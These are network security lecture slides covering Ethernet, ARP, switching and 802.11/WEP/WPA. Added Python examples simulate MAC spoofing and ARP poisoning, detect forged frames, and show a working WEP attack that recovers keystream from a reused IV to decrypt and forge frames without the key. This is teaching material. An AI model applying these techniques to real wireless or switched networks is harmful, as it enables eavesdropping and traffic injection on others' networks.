
Introduction to Network Security

Chapter 5 Physical Network Layer

Dr. Doug Jacobson - Introduction to Network Security - 2009

Topics

  • Lower Layer Security
  • Physical Layer Overview
  • Common attack methods
  • Ethernet
  • Wireless Security
  • General Mitigation Methods

Physical Network Layer

[Figure: the physical network layer. Software side: drivers, service access points and data buffers exchange digital data in bytes with the upper layer. Hardware side: the medium access protocol and the device interface put a physical-media-specific signal onto the physical media.]

Common Attack Methods

  • Spoofing
  • Sniffing
  • Physical Attacks

Hardware Addressing

[Figure: devices D1-D7 with hardware addresses HW-D1 to HW-D7 on networks N1, N2 and N3, joined by router R1 (HW-R1a, HW-R1b) and router R2 (HW-R2a, HW-R2b). A packet crossing from N1 to N3 carries a new pair of hardware addresses on each network; hardware addresses only have meaning on the local network.]

Hardware Address Spoofing

[Figure: Computer 1 (HW = A1) on Network A, Router 1 (HW = A2, B1) between Networks A and B, Router 2 (HW = B3, C1) between Networks B and C, Computer 2 (HW = C2) on Network C. Attacker 1, Attacker 2 and Attacker 3 sit on Networks A, B and C respectively, so each one sees, and can spoof, only the hardware addresses of its own network.]

Network Sniffing

[Figure: network sniffing.]

Physical Attacks

  • Bad network cable
  • Network cable loop (both ends plugged into the same device)
  • Bad network controller
  • Two network controllers with the same hardware address

Wired Network Protocols

  • Many protocols
  • Local Area Networks (LAN)

– Ethernet is the most common

  • Wide Area Networks (WAN)

Ethernet

  • Developed in 1973 by Xerox
  • Speeds

– 10 Mbps
– 100 Mbps
– 1000 Mbps (gigabit)
– 10 Gigabit

Ethernet Transmission media

  Name         Cable type                              Speed       Maximum distance between devices
  10Base2      Coax                                    10 Mbps     185 meters
  10BaseF      Fiber                                   10 Mbps     500 meters
  10BaseT      Twisted pair                            10 Mbps     100 meters
  100BaseT     Twisted pair                            100 Mbps    100 meters
  100BaseFX    Fiber                                   100 Mbps    1000 meters
  1000Base-X   Fiber (SX, LX) or shielded copper (CX)  1000 Mbps   Depends on cable type

Coaxial Ethernet

[Figure: devices D1-D7 and router R1 all attached to one shared coaxial cable; a packet placed on the cable passes every attached device, so any of them can read it.]

Ethernet Access Method

  • CSMA/CD (Carrier Sense Multiple Access with Collision Detection)

– Listen
– Talk if no one else is talking
– Back off if more than one talks at a time
– Minimum packet length is used to guarantee that a collision can be seen by all machines. This also puts a limit on the length of the cable

[Figure 5.5 CSMA/CD Ethernet Protocol: flowchart. Packet to send: listen; while the medium is not quiet, keep listening. When quiet, send and listen. If a collision is seen, increase N; if N > 16 report an error, otherwise pick a random number between 1 and N, wait that long and listen again. If the packet is sent without a collision it is done; if there is more data, send the next packet.]

Ethernet Collision Domain

  • The range that is affected when a collision occurs.
  • For 10 Mbps Ethernet it is 2500 meters
  • This can be changed by using switches and routers (more later)

Connecting Devices

  • Repeater (physical layer only)
  • Hub (multi port repeater)
  • Bridge (layer 2 only)
  • Router (layer 3)
  • Layer 2 switch
  • Layer 3 switch

Ethernet Hubs

[Figure: several hubs cascaded together with computers C1-C7 attached; every port of every hub is in one collision domain, and every computer sees every frame.]

Ethernet switches

  • Collisions can slow the network down
  • Switches create multiple collision domains
  • Typically one machine per leg of the switch
  • Switches only pass traffic to the leg of the switch where the destination is located
  • Switches reduce the traffic on each leg

– Problem with network monitoring: a sniffer on one leg no longer sees the traffic of the other legs

Ethernet Switch

[Figure: Switches 1-4 and router R1 connecting computers C1-C7. Port table, switch 2: P1 Uplink, P2 C2, P3 Multiple (several hardware addresses learned behind a downstream switch). Port table, switch 4: P1 Uplink, P2 C5, P3 C6, P4 C7.]

Ethernet Tap Points

[Figure: two ways to attach a monitoring point. Either a tap or a hub is inserted on the link between the router and Switch 1, so the monitor sees everything crossing that link, or a spanning (mirrored) port on the switch copies the traffic of the other ports to the monitoring point.]

Ethernet - Frame

  Field                     Size
  Preamble (on wire only)   7 bytes
  Start Frame Delimiter     1 byte
  Destination Address       6 bytes
  Source Address            6 bytes
  Type or Length            2 bytes
  Data                      46-1500 bytes
  FCS                       4 bytes

Ethernet Addresses

  • Goal is to have all addresses globally unique
  • 6 bytes

– Upper 3 bytes vendor code (the OUI)
– Lower 3 bytes independent (assigned by the vendor)

  • All 1's = broadcast address

Ethernet Type/length

  • If the value is 1500 (0x05DC) or less it is a length field; if it is 0x0600 (1536) or greater it is a protocol type field. Values in between are reserved. Some common types (hex) are:

  • 0800 DoD Internet Protocol (IP)
  • 0805 X.25 level 3
  • 0806 Address Resolution Protocol (ARP)
  • 6003 DECNET Phase IV
  • 6004 DEC LAT
  • 809B EtherTalk
  • 80F3 AppleTalk ARP

Attacks and vulnerabilities

  • Header-based
  • Protocol-based
  • Authentication-based
  • Traffic-based
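
The frame layout, address rules and type/length test of the three slides above, as an added worked example (not code from the slides or the book). It parses a raw Ethernet frame, decides whether the two-byte field is a type or a length, pulls out the vendor code and the broadcast, group and locally-administered address bits, and verifies the FCS. The sample frames and all addresses in it are constructed; the EtherType table is the short list from the slide.

```python
"""Parse an Ethernet frame and check its FCS (added example, constructed data)."""
import struct
import zlib

# EtherType values listed on the slide.
ETHERTYPES = {
    0x0800: "IP", 0x0805: "X.25 level 3", 0x0806: "ARP",
    0x6003: "DECNET Phase IV", 0x6004: "DEC LAT",
    0x809B: "EtherTalk", 0x80F3: "AppleTalk ARP",
}
BROADCAST = b"\xff" * 6
HOST_A = bytes.fromhex("001122334455")   # constructed station, vendor code 00:11:22
ROUTER = bytes.fromhex("00aabbccddee")   # constructed router


def mac_str(b):
    return ":".join(f"{x:02x}" for x in b)


def fcs(body):
    # The 802.3 FCS is CRC-32 with the same polynomial zlib uses, sent LSB first.
    return struct.pack("<I", zlib.crc32(body) & 0xFFFFFFFF)


def build_frame(dst, src, type_or_length, payload):
    """Frame without preamble/SFD: data padded to the 46-byte minimum, FCS appended."""
    body = dst + src + struct.pack("!H", type_or_length) + payload.ljust(46, b"\x00")
    return body + fcs(body)


def parse_frame(frame):
    """Header fields plus the flags a sniffer or IDS would look at."""
    if len(frame) < 14 + 46 + 4:
        raise ValueError("runt frame: shorter than the 64-byte minimum")
    dst, src, tl = struct.unpack("!6s6sH", frame[:14])
    payload = frame[14:-4]
    if tl <= 1500:                   # IEEE 802.3: a length
        kind, proto = "length", None
        if tl > len(payload):
            raise ValueError("length field exceeds the data present")
    elif tl >= 0x0600:               # Ethernet II: a protocol type
        kind, proto = "type", ETHERTYPES.get(tl, f"0x{tl:04x}")
    else:
        raise ValueError(f"reserved type/length value 0x{tl:04x}")
    return {
        "dst": mac_str(dst),
        "src": mac_str(src),
        "dst_is_broadcast": dst == BROADCAST,
        "dst_is_multicast": bool(dst[0] & 0x01),          # I/G bit of the first byte
        "src_oui": mac_str(src[:3]),                      # upper 3 bytes: vendor code
        "src_locally_administered": bool(src[0] & 0x02),  # U/L bit: software chose the address
        "src_is_group": bool(src[0] & 0x01),              # never legitimate in a source
        "type_or_length": kind,
        "protocol": proto,
        "payload_len": len(payload),
        "fcs_ok": fcs(frame[:-4]) == frame[-4:],
    }


def sample_frames():
    """Constructed frames: an ARP broadcast, an IP unicast, an 802.3 LLC frame
    carrying a length field, and an IP frame with a forged group source address."""
    arp = (b"\x00\x01\x08\x00\x06\x04\x00\x01" + HOST_A + b"\x0a\x00\x00\x05"
           + bytes(6) + b"\x0a\x00\x00\x01")
    return {
        "arp_broadcast": build_frame(BROADCAST, HOST_A, 0x0806, arp),
        "ip_unicast": build_frame(ROUTER, HOST_A, 0x0800, b"\x45" + bytes(19)),
        "llc_length": build_frame(ROUTER, HOST_A, 46, b"\xaa\xaa\x03" + bytes(43)),
        "group_source": build_frame(ROUTER, b"\x01" + HOST_A[1:], 0x0800, b"\x45" + bytes(19)),
    }
```

The `src_is_group` and `src_locally_administered` flags are the header checks worth alerting on: a group bit in a source address is always forged, and a locally administered source means software rather than the vendor chose the address (common for spoofing, but also for virtual machines, so treat it as a hint rather than proof). A wrong FCS on an otherwise well-formed frame usually means a bad cable or controller, the physical attacks listed earlier.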

Header-Based

  • Attacks

– Setting the destination address as a broadcast address can cause traffic problems
– Setting the source address can cause switches to get confused: the switch learns the forged source on the attacker's port and delivers the real station's traffic there, and a flood of random sources fills the port table so the switch falls back to sending frames out every port, like a hub

  • Mitigation

– Very difficult to mitigate

Protocol-Based

  • Protocol is simple and is in hardware
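
The two ways a forged source address confuses a switch, as an added example (not from the slides): a toy learning switch with a bounded port table, the single-frame spoof that redirects the victim's traffic, the table-overflow flood that turns the switch back into a hub, and the port-security limit that stops both. Port names, addresses and the four-entry table are constructed; real tables hold thousands of entries, which is why the overflow attack sends thousands of forged sources.

```python
"""Toy learning switch: source spoofing, table overflow, port security (added example)."""
from collections import OrderedDict

BROADCAST = "ff:ff:ff:ff:ff:ff"
VICTIM = "00:11:22:33:44:55"     # constructed addresses
ROUTER = "00:aa:bb:cc:dd:ee"
ATTACKER = "02:de:ad:be:ef:01"


class Switch:
    def __init__(self, ports, table_size=4, max_macs_per_port=None):
        self.ports = list(ports)
        self.table = OrderedDict()                    # hardware address -> port
        self.table_size = table_size
        self.max_macs_per_port = max_macs_per_port    # None: no port security
        self.shutdown = set()                         # ports disabled by port security
        self.log = []

    def _learn(self, port, src):
        """Record src behind port; False if port security refuses the address."""
        if self.max_macs_per_port is not None:
            on_port = {m for m, p in self.table.items() if p == port}
            if src not in on_port and len(on_port) >= self.max_macs_per_port:
                self.shutdown.add(port)
                self.log.append(f"port-security: {port} shut down, {src} would exceed "
                                f"{self.max_macs_per_port} address(es)")
                return False
        old = self.table.pop(src, None)
        if old is not None and old != port:
            self.log.append(f"mac-move: {src} {old} -> {port}")
        if len(self.table) >= self.table_size:
            evicted, _ = self.table.popitem(last=False)   # oldest entry is dropped
            self.log.append(f"table full: evicted {evicted}")
        self.table[src] = port
        return True

    def forward(self, in_port, dst, src):
        """Ports a frame arriving on in_port is sent out of."""
        if in_port in self.shutdown or not self._learn(in_port, src):
            return set()
        if dst == BROADCAST or dst not in self.table:
            # Unknown destination: flood, so every leg sees the frame as on a hub.
            return {p for p in self.ports if p != in_port and p not in self.shutdown}
        out = self.table[dst]
        return set() if out == in_port else {out}


def demo_spoofed_source():
    """One frame from P3 with the victim's source address is enough: the router's
    traffic for the victim now leaves on P3 instead of P1."""
    sw = Switch(["P1", "P2", "P3"])
    sw.forward("P1", BROADCAST, VICTIM)          # victim really is on P1
    sw.forward("P3", BROADCAST, VICTIM)          # forged source from the attacker's port
    return sw.forward("P2", VICTIM, ROUTER)      # -> {"P3"}


def demo_table_overflow():
    """Forged sources push the victim out of the table; its unicast traffic is
    then flooded to every port, including the attacker's."""
    sw = Switch(["P1", "P2", "P3"], table_size=4)
    sw.forward("P1", BROADCAST, VICTIM)
    for i in range(50):
        sw.forward("P3", BROADCAST, f"02:00:00:00:00:{i:02x}")
    return sw.forward("P2", VICTIM, ROUTER)      # -> {"P1", "P3"}


def demo_port_security():
    """Same switch limited to one address per port: the forged source shuts P3
    down and the victim keeps its traffic."""
    sw = Switch(["P1", "P2", "P3"], table_size=4, max_macs_per_port=1)
    sw.forward("P1", BROADCAST, VICTIM)
    sw.forward("P3", BROADCAST, ATTACKER)
    sw.forward("P3", BROADCAST, VICTIM)          # second address on P3: port shut
    return sw.forward("P2", VICTIM, ROUTER), sw.shutdown   # -> ({"P1"}, {"P3"})
```

The `mac-move` log line is the signal a real switch exposes for the first attack; the port-security limit is the usual answer to the second, at the cost of breaking any port that legitimately carries several addresses (a downstream switch or a virtualization host), which is why the slide calls this hard to mitigate.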

Authentication-Based

  • You can set the hardware address
  • Hardware address is used to authenticate in switches
  • Hardware addresses can be used to authenticate devices in a network

Authentication-Based

  • Destination address spoofing
  • Destination address is obtained dynamically via a protocol (ARP, for IP over Ethernet)
  • Trick a device into thinking you are the destination (ARP Poisoning)
  • No good mitigation method

ARP Poisoning

[Figure: D1, the attacker and router R2 on the same switch. The attacker sends forged ARP replies so that D1 maps R2's IP address to the attacker's hardware address and R2 maps D1's IP address to it as well; both then send their traffic for each other through the attacker.]

Authentication-Based

  • Source Address Spoofing
  • Source address is not used for authentication by default
  • New security and network management methods are starting to use the source address to authenticate the device (Network Access Control [NAC])
  • More on NAC as a general countermeasure later
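
Since the slide offers no good mitigation for ARP poisoning, detection is what is left. The added example below (not from the slides; the addresses and packet sequence are constructed) parses raw ARP packets and does what tools like arpwatch do: remember which hardware address last claimed each IP address, and alert when a binding changes or when a reply shows up that nobody asked for. The scenario is the figure above: D1 resolves R2 normally, then the attacker poisons both sides.

```python
"""Detect ARP poisoning from ARP traffic (added example, constructed data)."""
import ipaddress
import struct

ARP_FMT = "!HHBBH6s4s6s4s"        # htype, ptype, hlen, plen, op, sha, spa, tha, tpa
REQUEST, REPLY = 1, 2
ZERO_MAC = bytes(6)

D1 = bytes.fromhex("001122334455")   # station D1 (constructed)
R2 = bytes.fromhex("00aabbccddee")   # router R2 (constructed)
ATT = bytes.fromhex("02deadbeef01")  # attacker (constructed)
D1_IP, R2_IP = "10.0.0.5", "10.0.0.1"


def mac_str(b):
    return ":".join(f"{x:02x}" for x in b)


def build_arp(op, sender_mac, sender_ip, target_mac, target_ip):
    return struct.pack(ARP_FMT, 1, 0x0800, 6, 4, op,
                       sender_mac, ipaddress.IPv4Address(sender_ip).packed,
                       target_mac, ipaddress.IPv4Address(target_ip).packed)


def parse_arp(payload):
    htype, ptype, hlen, plen, op, sha, spa, tha, tpa = struct.unpack(ARP_FMT, payload[:28])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        raise ValueError("not Ethernet/IPv4 ARP")
    return {"op": op, "sha": mac_str(sha), "spa": str(ipaddress.IPv4Address(spa)),
            "tha": mac_str(tha), "tpa": str(ipaddress.IPv4Address(tpa))}


class ArpWatch:
    def __init__(self):
        self.bindings = {}      # ip -> hardware address last seen claiming it
        self.pending = set()    # (requester mac, ip asked for) awaiting a reply
        self.alerts = []

    def _bind(self, ip, mac, how):
        old = self.bindings.get(ip)
        if old is not None and old != mac:
            self.alerts.append(f"changed: {ip} was {old}, now {mac} ({how})")
        self.bindings[ip] = mac

    def observe(self, payload):
        a = parse_arp(payload)
        if a["op"] == REQUEST:
            self.pending.add((a["sha"], a["tpa"]))
            self._bind(a["spa"], a["sha"], "request")   # requests assert a binding too
        elif a["op"] == REPLY:
            # A reply is expected only if its target recently asked for its sender.
            if (a["tha"], a["spa"]) in self.pending:
                self.pending.discard((a["tha"], a["spa"]))
            else:
                self.alerts.append(f"unsolicited reply: {a['spa']} is-at {a['sha']} to {a['tha']}")
            self._bind(a["spa"], a["sha"], "reply")
        return a


def run_scenario():
    """D1 resolves R2, then the attacker poisons D1's and R2's caches."""
    w = ArpWatch()
    w.observe(build_arp(REQUEST, D1, D1_IP, ZERO_MAC, R2_IP))   # D1: who has R2?
    w.observe(build_arp(REPLY, R2, R2_IP, D1, D1_IP))           # legitimate answer
    w.observe(build_arp(REPLY, ATT, R2_IP, D1, D1_IP))          # "R2 is at ATT", to D1
    w.observe(build_arp(REPLY, ATT, D1_IP, R2, R2_IP))          # "D1 is at ATT", to R2
    return w
```

A replaced network card produces one "changed" alert as well, so the alerts are for an operator to review rather than to block on; the "unsolicited reply" alerts are the stronger signal, since hosts only answer requests. Note that the watcher must sit where it can see the ARP traffic, which on a switched network means a mirrored port or tap as on the Ethernet Tap Points slide.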

Traffic-Based

  • Attack

– Ethernet controllers can be set in promiscuous mode which enables them to sniff traffic

  • Mitigation

– Encryption, VLAN (more later)

  • Broadcast traffic can cause flooding, hard to flood unless directly connected to the LAN
  • No good mitigation for flooding

Wireless Security Topics

  • Standards
  • Devices
  • Protocol
  • Packet Format
  • Vulnerabilities
  • Mitigation

Wireless Standards

  Name      Frequency       Data Rate       Max Distance
  802.11a   5 GHz           54 Mbps         30 meters
  802.11b   2.4 GHz         11 Mbps         30 meters
  802.11g   2.4 GHz         11-54 Mbps      30 meters
  802.11n   2.4 or 5 GHz    200-500 Mbps    50 meters

Signal Reflection

[Figure: signal reflection.]

Wireless Ethernet 802.11

  • Two topologies

– IBSS Independent Basic Service Set

  • Ad-hoc, all stations are peers

– ESS Extended Service Set

  • AP – Access points connected to a network
  • Station plus the AP form a BSS

Wireless Network Environment

[Figure: a router and switch serving wired devices, plus three access points: Access point A with SSID = LAB, Access point B with SSID = OFFICE and Access point C with SSID = SERVER ROOM, serving wireless devices A-E.]

Discovery and joining

[Figure: Discovery: Access Point A sends beacons with SSID = LAB and Access Point B sends beacons with SSID = OFFICE; Device C sends a probe and receives a probe response from each (SSID = LAB, SSID = OFFICE). Joining: Device C sends an association request to the chosen access point and receives an association response.]

IEEE 802.11

  • CSMA/CA (Carrier Sense Multiple Access with Collision Avoidance)

– Wait till medium is free
– Backoff after defer random amount
– Exponential backoff for retransmission
– Backoff timer resets if idle
– Get an ACK if frame was received correctly

IEEE 802.11 Protocol

[Figure: CSMA/CA flowchart. Packet to send: listen; while the medium is not quiet, keep listening. When quiet, pick a random number of time slots as the slot count; while the slot count is not 0 and the medium stays quiet, wait a time slot and decrement the slot count; when it reaches 0, send. If an ACK comes back the packet is sent; if not, go back to listening and try again.]

IEEE 802.11 Access Points

Two types

  • Extended network

– Access point makes the wireless devices look like they are on the same network as the wired devices

  • Wireless router

– Access point acts as a router

Extended Network

[Figure: wired devices A-E behind a router and switch, with the access point bridging wireless devices F and G onto the same network.]

Wireless Router

[Figure: wired devices A-C on Network 1 behind a router and switch; the wireless router attaches to Network 1 and puts wireless devices D-F on a separate Network 2.]

802.11 Frame Format

  Field           Bytes
  Frame Control   2
  Duration/ID     2
  Addr 1          6
  Addr 2          6
  Addr 3          6
  Seq Control     2
  Addr 4          6
  Data            0 - 2312
  FCS             4

  • Frame Control: Used to identify the frame type and other frame specific information.
  • Duration/ID: Used to manage the access control protocol.
  • Address 1: Used to identify the destination of the transmitted packet. This is used by the hardware controller to determine if the frame should be read. If it does not match the address of the controller the remainder of the frame is ignored.

802.11 Frame Format

  • Address 2: Address of the transmitting device.
  • Address 3: Used when the access point is part of an extended network where the access point will relay the traffic; it carries the address on the far side of the access point (the final destination or the original source, depending on the direction of the frame).
  • Address 4: Used only when a frame is relayed from one access point to another (both the To DS and From DS bits of the frame control field are set); it then carries the original source address.

802.11 Frame Format

  • Sequence Control: Used by the acknowledgement process (sequence and fragment numbers, so a retransmitted duplicate can be discarded).
  • Data: The data field contains the data. The data field length is limited to 2312 bytes. Wireless Ethernet does not have a minimum data length.
  • Frame Check Sequence (FCS): This field is used to help verify that the frame has not been corrupted during transmission.

Header Based

  • Setting the destination address as a broadcast address can cause traffic problems
  • Denial of Service

– Invalid headers will cause loss of access or loss of association (for example a forged deauthentication or disassociation frame that appears to come from the access point)

  • Not easy to fix
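
The three frame-format slides and the header-based DoS above, as an added example (not from the slides): a parser for the 802.11 MAC header that resolves which of the four addresses is the source, destination and BSSID from the To DS / From DS bits, reads the SSID out of beacons and probes (the Discovery and joining exchange) and the reason code out of deauthentication and disassociation frames, and then flags the unprotected deauth/disassoc frames that claim to come from one of our own access points. Addresses and frames are constructed; the header layout follows IEEE 802.11 and the FCS is the same CRC-32 as Ethernet.

```python
"""Parse 802.11 headers and spot forged disconnect frames (added example, constructed data)."""
import struct
import zlib

MGMT, CTRL, DATA = 0, 1, 2
MGMT_SUBTYPES = {0: "assoc-req", 1: "assoc-resp", 4: "probe-req", 5: "probe-resp",
                 8: "beacon", 10: "disassoc", 11: "auth", 12: "deauth"}
BROADCAST = b"\xff" * 6
AP = bytes.fromhex("00aabbccdd01")      # access point / BSSID (constructed)
STA = bytes.fromhex("001122334455")     # wireless station (constructed)
WIRED = bytes.fromhex("00aabbccdd99")   # host on the wired side (constructed)


def mac_str(b):
    return ":".join(f"{x:02x}" for x in b)


def fcs(body):
    return struct.pack("<I", zlib.crc32(body) & 0xFFFFFFFF)


def build_80211(ftype, subtype, a1, a2, a3, body=b"", to_ds=False, from_ds=False, seq=0):
    flags = int(to_ds) | (int(from_ds) << 1)
    fc = (ftype << 2) | (subtype << 4) | (flags << 8)      # protocol version 0
    hdr = struct.pack("<HH6s6s6sH", fc, 0, a1, a2, a3, seq << 4)
    return hdr + body + fcs(hdr + body)


def ssid_from_tags(body, off):
    """Walk the tagged parameters (id, length, value); tag 0 is the SSID."""
    while off + 2 <= len(body):
        tag, ln = body[off], body[off + 1]
        if tag == 0:
            return body[off + 2:off + 2 + ln].decode("utf-8", "replace")
        off += 2 + ln
    return None


def parse_80211(frame):
    fc, duration = struct.unpack_from("<HH", frame, 0)
    ftype, subtype, flags = (fc >> 2) & 0x3, (fc >> 4) & 0xF, fc >> 8
    to_ds, from_ds = bool(flags & 0x01), bool(flags & 0x02)
    info = {"type": ftype, "subtype": subtype, "to_ds": to_ds, "from_ds": from_ds,
            "protected": bool(flags & 0x40), "duration": duration,
            "fcs_ok": fcs(frame[:-4]) == frame[-4:]}
    if ftype == CTRL:                        # control frames carry one or two addresses
        info["addr1"] = mac_str(frame[4:10])
        if subtype in (8, 9, 10, 11, 14, 15):
            info["addr2"] = mac_str(frame[10:16])
        return info
    a1, a2, a3, seq = struct.unpack_from("<6s6s6sH", frame, 4)
    info.update(addr1=mac_str(a1), addr2=mac_str(a2), addr3=mac_str(a3),
                seq_num=seq >> 4, frag_num=seq & 0xF)
    body_off = 24
    if ftype == DATA and to_ds and from_ds:
        info["addr4"] = mac_str(frame[24:30])   # only present in AP-to-AP relays
        body_off = 30
    # Which address is source, destination and BSSID depends on To DS / From DS.
    if ftype == MGMT or not (to_ds or from_ds):
        info.update(da=info["addr1"], sa=info["addr2"], bssid=info["addr3"])
    elif to_ds and not from_ds:
        info.update(bssid=info["addr1"], sa=info["addr2"], da=info["addr3"])
    elif from_ds and not to_ds:
        info.update(da=info["addr1"], bssid=info["addr2"], sa=info["addr3"])
    else:
        info.update(ra=info["addr1"], ta=info["addr2"], da=info["addr3"], sa=info["addr4"])
    body = frame[body_off:-4]
    if ftype == MGMT:
        info["subtype_name"] = MGMT_SUBTYPES.get(subtype, str(subtype))
        if subtype in (10, 12):                  # disassoc / deauth carry a reason code
            info["reason"] = struct.unpack_from("<H", body, 0)[0]
        elif subtype in (4, 5, 8):               # beacon/probe resp: 12 fixed bytes first
            info["ssid"] = ssid_from_tags(body, 0 if subtype == 4 else 12)
    return info


def disconnect_alerts(frames, known_bssids):
    """Unprotected deauth/disassoc frames claiming to come from one of our APs:
    exactly the header that knocks a station off the network."""
    alerts = []
    for f in frames:
        p = parse_80211(f)
        if (p["type"] == MGMT and p["subtype"] in (10, 12)
                and not p["protected"] and p["sa"] in known_bssids):
            alerts.append(f"{p['subtype_name']} from {p['sa']} to {p['da']} reason {p['reason']}")
    return alerts


def sample_frames():
    beacon = build_80211(MGMT, 8, BROADCAST, AP, AP,
                         body=bytes(12) + b"\x00\x03LAB" + b"\x01\x01\x82")
    data = build_80211(DATA, 0, AP, STA, WIRED, body=b"\xaa\xaa\x03", to_ds=True, seq=7)
    deauth = build_80211(MGMT, 12, STA, AP, AP, body=struct.pack("<H", 7))
    return {"beacon": beacon, "data": data, "deauth": deauth}
```

The alert cannot tell a forged deauthentication from a real one, because nothing in the header authenticates the transmitter; that is the slide's "not easy to fix". A burst of them aimed at one station or carrying a reason code the access point never uses is the practical tell.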

Protocol-Based

  • Protocol is simple and is in hardware
  • Can transmit packets to cause Denial of Service
  • Jamming of signals by ignoring the protocol
  • Very hard to stop

Protocol-Based

  • Access point can broadcast its SSID

– Wardriving

  • www.wardriving.com
  • www.worldwidewardrive.org

Wardriving How easy

  • One laptop with wireless
  • Free software
  • GPS optional

WarDriving

[Figure: wardriving.]

Wardriving

Mitigation:

  • Do we need to mitigate it?
  • Turn off broadcast of SSID
  • Use encryption or Network Access Control (NAC) (make it an authentication problem)

SSID discovery

  • Sometimes additional information is provided by the SSID that could help an attacker
  • Business name
  • Home address or user's last name

Authentication Based

  • You can set the hardware address
  • Hardware address is used as authentication in Access Points
  • Device authentication

– Access point authentication
– Wireless device authentication

  • Access point configuration authentication

– Gaining access to the access point

Access point Authentication

  • Rogue access point

– Installed by valid user

  • Fake Access point

– Installed by attacker

Rogue Access Point

[Figure: a rogue user inside the building walls plugs a rogue access point into the internal switch behind the router; an attacker / wardriver outside the building reaches the internal network through it, never passing the Internet-facing router.]

Rogue Access Point

  • Provides access to attacker

– Intentional or unintentional

  • Bypasses perimeter security mechanisms
  • Hard to find and stop

– Scan for SSID
– Scan for wireless traffic

  • NAC might provide some help.

Fake Access Point

[Figure: a wireless user inside the building; the real access point is on the internal switch behind the router, while the attacker's fake access point outside the building walls advertises the same network to lure the user's device.]

Fake Access point

  • Hard to fake an access point within an organization.
  • Easier if the access point is a public access point with no encryption.

– Not much to be gained by this

Access Point Configuration Authentication

  • Access points are often configured over the network.
  • They have default passwords
  • An attacker could change security settings

Traffic Based

  • Wireless controllers, like Ethernet controllers, can be set in promiscuous (monitor) mode which enables them to sniff traffic
  • Broadcast traffic can cause flooding

Wired Equivalent Privacy (WEP)

  • Shared keys

– 40 bits
– 128 bits (a 104-bit key; the other 24 bits are the per-packet IV, which is sent in the clear)

  • Can be cracked if enough data is seen
  • Aircrack will find a WEP key

WEP

[Figure: Device A and Device B each exchange an associate request and associate response with the network in clear text, then send an authenticate request carrying the shared password and receive an acknowledgement; from then on their traffic is encrypted with the shared key.]
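
Why "enough data" is all it takes, as an added example that is not from the slides. WEP encrypts each frame with RC4 keyed by a 24-bit IV plus the shared key and protects it with a CRC-32 integrity value (ICV); the IV space is small enough that the same IV, and therefore the same keystream, recurs on a busy network. The code below shows what one reused IV gives away when the attacker knows the plaintext of one of the two frames (every IP frame starts with the same LLC/SNAP header, and an attacker can provoke traffic with known contents): the keystream, which decrypts the other frame and lets the attacker inject a frame that passes the ICV check, all without the key. The key, IV and frame contents are constructed; RC4 and the ICV are implemented as WEP uses them.

```python
"""WEP keystream reuse: decrypt and forge without the key (added example, constructed data)."""
import struct
import zlib

SNAP_IP = bytes.fromhex("aaaa030000000800")   # LLC/SNAP header every IP frame starts with


def rc4(key, n):
    """n bytes of RC4 keystream; the WEP per-frame key is IV || shared key."""
    s, j = list(range(256)), 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for _ in range(n):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def icv(data):
    return struct.pack("<I", zlib.crc32(data) & 0xFFFFFFFF)   # WEP integrity check value


def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(key, iv, plaintext):
    """Frame body as sent: IV in the clear, then RC4(IV||key) XOR (data||ICV)."""
    data = plaintext + icv(plaintext)
    return iv + xor(data, rc4(iv + key, len(data)))


def wep_decrypt(key, body):
    """The receiver's view: strip the IV, decrypt, verify the ICV."""
    iv, ct = body[:3], body[3:]
    data = xor(ct, rc4(iv + key, len(ct)))
    if icv(data[:-4]) != data[-4:]:
        raise ValueError("ICV mismatch")
    return data[:-4]


def recover_keystream(body, known_plaintext):
    """Attacker: ciphertext XOR known plaintext (with its ICV) = keystream for this IV."""
    return xor(body[3:], known_plaintext + icv(known_plaintext))


def decrypt_with_keystream(body, keystream):
    """Attacker: any frame under the same IV falls to the recovered keystream."""
    if len(body) - 3 > len(keystream):
        raise ValueError("not enough keystream")
    data = xor(body[3:], keystream)
    if icv(data[:-4]) != data[-4:]:
        raise ValueError("ICV mismatch")
    return data[:-4]


def forge(iv, keystream, plaintext):
    """Attacker: a frame with a valid ICV for this IV, never having seen the key."""
    data = plaintext + icv(plaintext)
    if len(data) > len(keystream):
        raise ValueError("not enough keystream")
    return iv + xor(data, keystream)


KEY = bytes.fromhex("0102030405")                            # 40-bit shared key (constructed)
IV = b"\x01\x02\x03"                                        # one of only 2**24 IVs
PT_KNOWN = SNAP_IP + b"ping payload the attacker provoked"   # plaintext the attacker knows
PT_SECRET = SNAP_IP + b"another station's traffic"           # shorter than PT_KNOWN


def demo():
    """Two frames under one IV: the known one leaks the keystream, which decrypts
    the other and lets the attacker inject a frame the access point accepts."""
    seen_known = wep_encrypt(KEY, IV, PT_KNOWN)
    seen_secret = wep_encrypt(KEY, IV, PT_SECRET)        # same IV: same keystream
    ks = recover_keystream(seen_known, PT_KNOWN)         # no key used from here on
    recovered = decrypt_with_keystream(seen_secret, ks)
    injected = forge(IV, ks, SNAP_IP + b"injected by attacker")
    return recovered, wep_decrypt(KEY, injected)         # second value: the AP's view
```

Even without a fully known plaintext, the eight SNAP bytes alone give eight keystream bytes for every IV seen, and because the ICV is a CRC rather than a keyed MAC, a frame can also be modified bit by bit with a matching ICV fix-up. Tools such as aircrack go further and recover the shared key itself from the statistics of many IVs; the point here is that WEP is lost well before that.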

Wi-Fi Protected Access (WPA)

  • Uses 802.1X + Extensible Authentication Protocol

– Authentication with an auth server

  • Encryption

– RC4 (TKIP, in WPA)
– AES (CCMP, in WPA2)

WPA – Home use

  • Uses a shared password for authentication
  • If the mobile's password matches the AP's then encryption keys are exchanged
  • New keys for each new association

Home-Based WPA

[Figure: Device A and Device B each exchange an associate request and associate response with the home network in clear text, present the password (the figure's "Send Password" step; in WPA-PSK the password itself is never transmitted, each side proves it holds it during the key negotiation) and receive an acknowledgement, then negotiate a key. Afterwards Device A's traffic is encrypted with session key A and Device B's with session key B.]

WPA – enterprise

  • Mobile associates with AP
  • Mobile authenticates with auth server (using 802.1X)
  • Authentication server distributes keys to AP and mobile
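
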